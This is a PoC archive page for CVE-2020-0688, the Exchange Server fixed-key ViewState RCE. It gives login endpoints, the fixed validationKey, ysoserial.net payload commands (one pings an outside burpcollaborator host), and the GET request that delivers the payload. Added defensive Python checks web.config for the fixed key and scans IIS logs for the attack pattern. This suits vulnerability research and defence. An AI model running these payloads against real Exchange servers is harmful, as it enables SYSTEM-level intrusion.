Related vulnerability
Title:
Microsoft Exchange Server authorization issue vulnerability
(CVE-2020-0688)
Description: Microsoft Exchange Server is an e-mail server product from Microsoft (USA). It provides mail access, storage and forwarding, voicemail, mail filtering, and related functions. Microsoft Exchange Server contains an authorization issue vulnerability that stems from the program failing to handle objects in memory correctly. An attacker can exploit it with a specially crafted e-mail to run arbitrary code in the context of the System user. The following products and versions are affected: Microsoft Exchange Server 2010, Microsoft Exchange Server 2013, Micro
Description
[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)
Introduction
<b>[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Instead of using randomly generated keys on a per-installation basis, all installations of Microsoft Exchange Server ship with the same `validationKey` and `decryptionKey` values in web.config. Thus, an <i>authenticated</i> attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of [YSoSerial.net](https://github.com/pwntester/ysoserial.net), an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel (ECP) web application, which runs with SYSTEM privileges.
<b>Step 1:</b> Visit one of the following endpoints to reach the authentication page
- [x] http(s)://exchangeserver/owa<br>
- [x] http(s)://exchangeserver/owa/auth.owa<br>
- [x] http(s)://exchangeserver/owa/auth/logon.aspx<br>
- [x] http(s)://exchangeserver/ecp<br>
- [x] http(s)://exchangeserver/ecp/default.aspx
<b>Step 2:</b> Log in with valid credentials (the account's privilege level does not matter), and take the `ASP.NET_SessionId` value from the HTTP response cookie and the `__VIEWSTATEGENERATOR` value from the HTTP response body. For example
- [x] <b>ASP_NET_SessionId:</b> 05ae4b41-51e1-4c3a-9241-6b87b169d663<br>
- [x] <b>__VIEWSTATEGENERATOR:</b> B97B4E27<br>
- [x] <b>validationKey (Fixed):</b> CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF<br>
- [x] <b>validationalg (Fixed):</b> SHA1
<b>Step 3:</b> To generate the payload (used to check for the vulnerability), use [YSoSerial.net](https://github.com/pwntester/ysoserial.net)
Note that if you have access to the target Exchange server, you can use the following payload, which creates a text file named `PoC.txt` in the `C:\` directory
```
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug --islegacy
```
However, if you cannot access the server, the following may be better.
```
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug --islegacy
```
<b>Step 4:</b> After step 3, we have the URL-encoded ViewState payload. Send a GET request to the endpoint below in the following format
```
http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>
```
The original blog post is available [here](https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys)
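As an added defender-side example (not code from the original README or from the ZDI post), the following Python checks for the two artefacts described above: whether an ECP web.config still carries the fixed `validationKey` quoted in Step 2, and which IIS log entries deliver `__VIEWSTATE` through a GET to /ecp/default.aspx in the Step 4 format. The web.config fragment, the log lines and the W3C field order are constructed assumptions, and the `decryptionKey` shown is a placeholder rather than the real value.

```python
"""Added defensive checks for CVE-2020-0688 (fixed ASP.NET machineKey in Exchange ECP)."""
import re
from urllib.parse import parse_qs
import xml.etree.ElementTree as ET

# Fixed validationKey quoted in Step 2 above; a server with the update applied no longer uses it.
FIXED_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"

# Constructed web.config fragment (assumption); decryptionKey is a placeholder, not the real value.
CONSTRUCTED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY" validation="SHA1" />
  </system.web>
</configuration>"""

# Constructed IIS log lines (assumption); fields: date time cs-method cs-uri-stem cs-uri-query sc-status c-ip
CONSTRUCTED_LOG_LINES = [
    "2020-02-26 10:15:02 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyAAAA 500 203.0.113.5",
    "2020-02-26 10:15:05 POST /ecp/default.aspx - 200 198.51.100.7",
    "2020-02-26 10:15:09 GET /owa/auth/logon.aspx url=https%3A%2F%2Fmail%2Fowa 200 198.51.100.7",
]
IIS_LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+)$")


def machinekey_uses_fixed_key(web_config_xml: str) -> bool:
    """True when any <machineKey> element still carries the known fixed validationKey."""
    root = ET.fromstring(web_config_xml)
    for mk in root.iter("machineKey"):
        if (mk.get("validationKey") or "").strip().upper() == FIXED_VALIDATION_KEY:
            return True
    return False


def find_viewstate_get_requests(log_lines):
    """Return (client_ip, status, generator) for GETs to /ecp/default.aspx with __VIEWSTATE in the query."""
    # Normal ECP pages post ViewState in the request body, so ViewState in a GET query string
    # (the Step 4 shape) stands out in the logs whatever the response code was.
    hits = []
    for line in log_lines:
        m = IIS_LOG_RE.match(line.strip())
        if not m:
            continue
        _date, _time, method, stem, query, status, ip = m.groups()
        params = parse_qs(query, keep_blank_values=True) if query != "-" else {}
        if method == "GET" and stem.lower() == "/ecp/default.aspx" and "__VIEWSTATE" in params:
            hits.append((ip, int(status), params.get("__VIEWSTATEGENERATOR", [""])[0]))
    return hits
```

The config check is the one to run after applying the update: a server that still returns True has not had its machineKey replaced.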
File snapshot
[4.0K] /data/pocs/d7090dc340de31dd62768a49d759356493f14d1a
└── [2.9K] README.md
0 directories, 1 file
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.